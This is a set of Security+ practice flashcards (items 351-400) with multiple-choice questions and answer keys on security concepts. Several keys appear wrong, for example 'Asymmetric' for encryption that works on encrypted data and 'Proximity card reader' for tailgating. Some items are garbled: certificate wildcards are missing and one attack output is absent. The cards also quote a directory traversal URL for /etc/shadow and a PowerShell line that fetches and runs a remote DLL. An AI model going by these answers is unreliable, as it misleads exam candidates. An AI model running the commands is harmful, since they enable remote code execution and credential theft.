Comptia 351-400 Flashcards by Avante Davidson

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs. Which of the following is the MOST likely cause of this issue?

A. TFTP was disabled on the local hosts.
B. SSH was turned off instead of modifying the configuration file.
C. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
D. Network services are no longer running on the NAS.

B. SSH was turned off instead of modifying the configuration file.

How well did you know this?

Not at all

Perfectly

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given the documentation only available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?

A. Bug bounty
B. Black-box
C. Gray-box
D. White-box

C. Gray-box

How well did you know this?

Not at all

Perfectly

A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

A. Disable Telnet and force SSH.
B. Establish a continuous ping.
C. Utilize an agentless monitor.
D. Enable SNMPv3 with passwords.

C. Utilize an agentless monitor.

How well did you know this?

Not at all

Perfectly

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities. Which of the following would BEST meet this need?

A. CVE
B. SIEM
C. SOAR
D. CVSS

D. CVSS

How well did you know this?

Not at all

Perfectly

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

A. CYOD
B. MDM
C. COPE
D. VDI

C. COPE

How well did you know this?

Not at all

Perfectly

A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use?

A. IDS solution
B. EDR solution
C. HIPS software solution
D. Network DLP solution

D. Network DLP solution

How well did you know this?

Not at all

Perfectly

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable?

A. SSO
B. MFA
C. PKI
D. DLP

A. SSO

How well did you know this?

Not at all

Perfectly

An employee’s company account was used in a data breach. Interviews with the employee revealed:

The employee was able to avoid changing passwords by using a previous password again.
The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)

A. Geographic dispersal
B. Password complexity
C. Password history
D. Geotagging
E. Password lockout
F. Geofencing

C. Password history
F. Geofencing

How well did you know this?

Not at all

Perfectly

A large industrial system’s smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company’s security manager notices the generator’s IP is sending packets to an internal file server’s IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

A. Segmentation
B. Firewall allow list
C. Containment
D. Isolation

B. Firewall allow list

How well did you know this?

Not at all

Perfectly

Which of the following technologies is used to actively monitor for specific file types being transmitted on the network?

A. File integrity monitoring
B. Honeynets
C. Tcpreplay
D. Data loss prevention

D. Data loss prevention

How well did you know this?

Not at all

Perfectly

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

A. HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
B. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
C. HTTPS://.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
D. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

C. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

How well did you know this?

Not at all

Perfectly

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be BEST to help the organization’s executives determine their next course of action?

A. An incident response plan
B. A communication plan
C. A disaster recovery plan
D. A business continuity plan

D. A business continuity plan

How well did you know this?

Not at all

Perfectly

A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred. Which of the following is the analyst MOST likely seeing?

A. http://sample.url.com/
B. http://sample.url.com/someotherpageonsite/../../../etc/shadow
C. http://sample.url.com/select-from-database-where-password-null
D. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect

B. http://sample.url.com/someotherpageonsite/../../../etc/shadow

How well did you know this?

Not at all

Perfectly

A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following BEST describes this type of attack?

A. Reconnaissance
B. Impersonation
C. Typosquatting
D. Watering-hole

C. Typosquatting

How well did you know this?

Not at all

Perfectly

The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?

A. NAC
B. ACL
C. WAF
D. NAT

B. ACL

How well did you know this?

Not at all

Perfectly

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the issue?

A. A non-disclosure agreement
B. Least privilege
C. An acceptable use policy
D. Offboarding

D. Offboarding

How well did you know this?

Not at all

Perfectly

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

A. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
B. The MRI vendor does not support newer versions of the OS.
C. Changing the OS breaches a support SLA with the MRI vendor.
D. The IT team does not have the budget required to upgrade the MRI scanner.

B. The MRI vendor does not support newer versions of the OS.

How well did you know this?

Not at all

Perfectly

A company received a “right to be forgotten” request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

A. NIST CSF
B. GDPR
C. PCI DSS
D. ISO 27001

B. GDPR

How well did you know this?

Not at all

Perfectly

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available?

A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supplies unit
D. Increasing power generator capacity

B. Installing a managed PDU

How well did you know this?

Not at all

Perfectly

An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. Which of the following solutions should the engineer implement?

A. CASB
B. WAF
C. Load balancer
D. VPN

C. Load balancer

How well did you know this?

Not at all

Perfectly

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these requirements? (Choose two.)

A. Full device encryption
B. Network usage rules
C. Geofencing
D. Containerization
E. Application approve list
F. Remote control

D. Containerization
F. Remote control

A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.)

A. IPSec
B. SFTP
C. SRTP
D. LDAPS
E. S/MIME
F. SSL VPN

A. IPSec
F. SSL VPN

A malicious actor recently penetrated a company’s network and moved laterally to the data center. Upon investigation, a forensics firm wants to know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?

A. Security
B. Application
C. Dump
D. Syslog

C. Dump

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the company?

A. SaaS
B. IaaS
C. PaaS
D. SDN

A. SaaS

A network administrator needs to determine the sequence of a server farm’s logs. Which of the following should the administrator consider? (Choose two.) A. Chain of custody B. Tags C. Reports D. Time stamps E. Hash values F. Time offset

D. Time stamps E. Hash values

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization? A. To provide data to quantify risk based on the organization's systems B. To keep all software and hardware fully patched for known vulnerabilities C. To only allow approved, organization-owned devices onto the business network D. To standardize by selecting one laptop model for all users in the organization

C. To only allow approved, organization-owned devices onto the business network

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider? A. Mandatory B. Rule-based C. Discretionary D. Role-based

D. Role-based

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it? A. Data custodian B. Data controller C. Data protection officer D. Data processor

B. Data controller

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints? A. Firewall B. SIEM C. IPS D. Protocol analyzer

B. SIEM

Which of the following types of controls is a turnstile? A. Physical B. Detective C. Corrective D. Technical

A. Physical

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked? A. nmap B. tracert C. ping D. ssh

B. tracert

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results: * The exception process and policy have been correctly followed by the majority of users. * A small number of users did not create tickets for the requests but were granted access. * All access had been approved by supervisors. * Valid requests for the access sporadically occurred across multiple departments. * Access, in most cases, had not been removed when it was no longer needed. Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame? A. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval. B. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request. C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team. D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement? A. Asymmetric B. Symmetric C. Homomorphic D. Ephemeral

A. Asymmetric

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as: A. a rootkit. B. a PUP. C. a backdoor. D. ransomware. E. a RAT.

B. a PUP.

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules? A. # iptables -t mangle -X B. # iptables -F C. # iptables -Z D. # iptables -P INPUT -j DROP

B. # iptables -F

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody? A. Document the collection and require a sign-off when possession changes. B. Lock the device in a safe or other secure location to prevent theft or alteration. C. Place the device in a Faraday cage to prevent corruption of the data. D. Record the collection in a blockchain-protected public ledger.

A. Document the collection and require a sign-off when possession changes.

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue? A. The vendor firmware lacks support. B. Zero-day vulnerabilities are being discovered. C. Third-party applications are not being patched. D. Code development is being outsourced.

C. Third-party applications are not being patched.

Which of the following controls would provide the BEST protection against tailgating? A. Access control vestibule B. Closed-circuit television C. Proximity card reader D. Faraday cage

C. Proximity card reader

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user's list of cron jobs: */10 * * * * root /writable/update.sh Which of the following actions should the penetration tester perform NEXT? A. Privilege escalation B. Memory leak C. Directory traversal D. Race condition

A. Privilege escalation

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll Which of the following BEST describes what the analyst found? A. A PowerShell code is performing a DLL injection. B. A PowerShell code is displaying a picture. C. A PowerShell code is configuring environmental variables. D. A PowerShell code is changing Windows Update settings

A. A PowerShell code is performing a DLL injection.

A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company’s server: Which of the following BEST describes this kind of attack? A. Directory traversal B. SQL injection C. API D. Request forgery

A. Directory traversal

An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities? A. Data protection officer B. Data owner C. Backup administrator D. Data custodian E. Internal auditor

C. Backup administrator

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise? A. White team B. Purple team C. Green team D. Blue team E. Red team

A. White team

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan? A. Vulnerabilities with a CVSS score greater than 6.9. B. Critical infrastructure vulnerabilities on non-IP protocols. C. CVEs related to non-Microsoft systems such as printers and switches. D. Missing patches for third-party software on Windows workstations and servers.

D. Missing patches for third-party software on Windows workstations and servers.

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose? A. MAC filtering B. Anti-malware C. Translation gateway D. VPN

D. VPN

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would MOST likely show where the malware originated? A. The DNS logs B. The web server logs C. The SIP traffic logs D. The SNMP logs

B. The web server logs

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key? A. .pfx B. .csr C. .pvk D. .cer

D. .cer

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider? A. Hashing B. Salting C. Lightweight cryptography D. Steganography

B. Salting

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are: * www.company.com (main website) * contactus.company.com (for locating a nearby location) * quotes.company.com (for requesting a price quote) The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements? A. SAN B. Wildcard C. Extended validation D. Self-signed

B. Wildcard

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst monitor? A. SFTP B. AIS C. Tor D. IoC

C. Tor